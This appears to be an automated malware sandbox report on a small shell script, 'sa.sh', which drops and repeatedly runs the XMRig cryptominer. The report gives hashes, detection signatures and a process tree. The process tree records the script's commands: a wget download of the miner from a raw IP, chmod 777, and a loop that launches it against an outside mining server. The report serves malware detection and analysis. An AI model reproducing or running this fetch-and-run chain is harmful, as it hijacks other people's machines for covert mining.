Analysis
-
max time kernel
148s -
max time network
12s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
29-12-2024 04:07
Static task
static1
Behavioral task
behavioral1
Sample
sa.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
sa.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
sa.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
sa.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
sa.sh
-
Size
438B
-
MD5
52f6ef322dd61383cc5f03bba971ecc1
-
SHA1
a540ec9917e63a178aa44b3f3570a54ff8c88135
-
SHA256
82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97
-
SHA512
c17b540e81ca673cfb39cedb1417bfebb0367d61f9f9315710713bc0167cfb953b2b0fdec2bad0435c4ac423e41935fac7fa76ceb288f07174273b9f32f1d938
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_xmrig behavioral4/files/fstream-1.dat xmrig -
Xmrig family
-
Xmrig_linux family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 771 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xmrig 774 xmrig /tmp/xmrig 790 xmrig /tmp/xmrig 824 xmrig /tmp/xmrig 828 xmrig /tmp/xmrig 835 xmrig /tmp/xmrig 839 xmrig /tmp/xmrig 843 xmrig /tmp/xmrig 847 xmrig /tmp/xmrig 851 xmrig /tmp/xmrig 855 xmrig /tmp/xmrig 859 xmrig /tmp/xmrig 863 xmrig /tmp/xmrig 867 xmrig /tmp/xmrig 871 xmrig /tmp/xmrig 875 xmrig /tmp/xmrig 879 xmrig /tmp/xmrig 883 xmrig /tmp/xmrig 887 xmrig /tmp/xmrig 891 xmrig /tmp/xmrig 895 xmrig /tmp/xmrig 899 xmrig /tmp/xmrig 903 xmrig /tmp/xmrig 907 xmrig /tmp/xmrig 911 xmrig /tmp/xmrig 915 xmrig /tmp/xmrig 919 xmrig /tmp/xmrig 923 xmrig /tmp/xmrig 927 xmrig -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 28 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep -
description ioc Process File opened for reading /proc/74/status pgrep File opened for reading /proc/1/cmdline pgrep File opened for reading /proc/154/status pgrep File opened for reading /proc/360/cmdline pgrep File opened for reading /proc/714/cmdline pgrep File opened for reading /proc/19/status pgrep File opened for reading /proc/170/status pgrep File opened for reading /proc/709/cmdline pgrep File opened for reading /proc/9/status pgrep File opened for reading /proc/708/status pgrep File opened for reading /proc/7/cmdline pgrep File opened for reading /proc/9/status pgrep File opened for reading /proc/18/status pgrep File opened for reading /proc/82/cmdline pgrep File opened for reading /proc/866/cmdline pgrep File opened for reading /proc/17/cmdline pgrep File opened for reading /proc/1/cmdline pgrep File opened for reading /proc/9/cmdline pgrep File opened for reading /proc/2/status pgrep File opened for reading /proc/707/status pgrep File opened for reading /proc/669/cmdline pgrep File opened for reading /proc/37/status pgrep File opened for reading /proc/154/status pgrep File opened for reading /proc/120/status pgrep File opened for reading /proc/15/status pgrep File opened for reading /proc/4/status pgrep File opened for reading /proc/11/cmdline pgrep File opened for reading /proc/16/status pgrep File opened for reading /proc/77/status pgrep File opened for reading /proc/4/cmdline pgrep File opened for reading /proc/13/cmdline pgrep File opened for reading /proc/360/status pgrep File opened for reading /proc/6/status pgrep File opened for reading /proc/77/cmdline pgrep File opened for reading /proc/154/status pgrep File opened for reading /proc/15/status pgrep File opened for reading /proc/160/cmdline pgrep File opened for reading /proc/364/cmdline pgrep File opened for reading /proc/11/cmdline pgrep File opened for reading /proc/333/status pgrep File opened for reading /proc/360/cmdline pgrep File opened for reading /proc/333/cmdline pgrep File opened for reading /proc/681/status pgrep File opened for reading /proc/708/cmdline pgrep File opened for reading /proc/3/cmdline pgrep File opened for reading /proc/20/status pgrep File opened for reading /proc/69/cmdline pgrep File opened for reading /proc/6/cmdline pgrep File opened for reading /proc/23/status pgrep File opened for reading /proc/681/status pgrep File opened for reading /proc/252/status pgrep File opened for reading /proc/682/status pgrep File opened for reading /proc/709/cmdline pgrep File opened for reading /proc/5/status pgrep File opened for reading /proc/12/status pgrep File opened for reading /proc/714/cmdline pgrep File opened for reading /proc/12/cmdline pgrep File opened for reading /proc/23/status pgrep File opened for reading /proc/5/cmdline pgrep File opened for reading /proc/364/cmdline pgrep File opened for reading /proc/82/cmdline pgrep File opened for reading /proc/364/status pgrep File opened for reading /proc/333/status pgrep File opened for reading /proc/81/cmdline pgrep -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xmrig wget
Processes
-
/tmp/sa.sh/tmp/sa.sh1⤵PID:710
-
/usr/bin/nohupnohup bash /tmp/sa.sh nobg1⤵PID:713
-
/usr/local/sbin/bashbash /tmp/sa.sh nobg1⤵PID:713
-
/usr/local/bin/bashbash /tmp/sa.sh nobg1⤵PID:713
-
/usr/sbin/bashbash /tmp/sa.sh nobg1⤵PID:713
-
/usr/bin/bashbash /tmp/sa.sh nobg1⤵PID:713
-
/sbin/bashbash /tmp/sa.sh nobg1⤵PID:713
-
/bin/bashbash /tmp/sa.sh nobg1⤵PID:713
-
/usr/bin/wgetwget http://81.28.10.96/xmrig --no-check-certificate -O xmrig2⤵
- Writes file to tmp directory
PID:720
-
-
/bin/chmodchmod 777 xmrig2⤵
- File and Directory Permissions Modification
PID:771
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:772
-
-
/bin/sleepsleep 52⤵PID:775
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:774
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:789
-
-
/bin/sleepsleep 52⤵PID:791
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:790
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:823
-
-
/bin/sleepsleep 52⤵PID:825
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:824
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
PID:827
-
-
/bin/sleepsleep 52⤵PID:829
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:828
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:834
-
-
/bin/sleepsleep 52⤵PID:836
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:835
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:838
-
-
/bin/sleepsleep 52⤵PID:840
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:839
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:842
-
-
/bin/sleepsleep 52⤵PID:844
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:843
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:846
-
-
/bin/sleepsleep 52⤵PID:848
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:847
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:850
-
-
/bin/sleepsleep 52⤵PID:852
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:851
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:854
-
-
/bin/sleepsleep 52⤵PID:856
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:855
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:858
-
-
/bin/sleepsleep 52⤵PID:860
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:859
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:862
-
-
/bin/sleepsleep 52⤵PID:864
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:863
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:866
-
-
/bin/sleepsleep 52⤵PID:868
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:867
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
PID:870
-
-
/bin/sleepsleep 52⤵PID:872
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:871
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
PID:874
-
-
/bin/sleepsleep 52⤵PID:876
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:875
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:878
-
-
/bin/sleepsleep 52⤵PID:880
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:879
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:882
-
-
/bin/sleepsleep 52⤵PID:884
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:883
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:886
-
-
/bin/sleepsleep 52⤵PID:888
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:887
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:890
-
-
/bin/sleepsleep 52⤵PID:892
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:891
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:894
-
-
/bin/sleepsleep 52⤵PID:896
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:895
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:898
-
-
/bin/sleepsleep 52⤵PID:900
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:899
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:902
-
-
/bin/sleepsleep 52⤵PID:904
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:903
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
PID:906
-
-
/bin/sleepsleep 52⤵PID:908
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:907
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
PID:910
-
-
/bin/sleepsleep 52⤵PID:912
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:911
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:914
-
-
/bin/sleepsleep 52⤵PID:916
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:915
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:918
-
-
/bin/sleepsleep 52⤵PID:920
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:919
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:922
-
-
/bin/sleepsleep 52⤵PID:924
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:923
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:926
-
-
/bin/sleepsleep 52⤵PID:928
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:927
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.9MB
MD58f4fff0ded94f1141768220906abfbb8
SHA1ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA5120096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee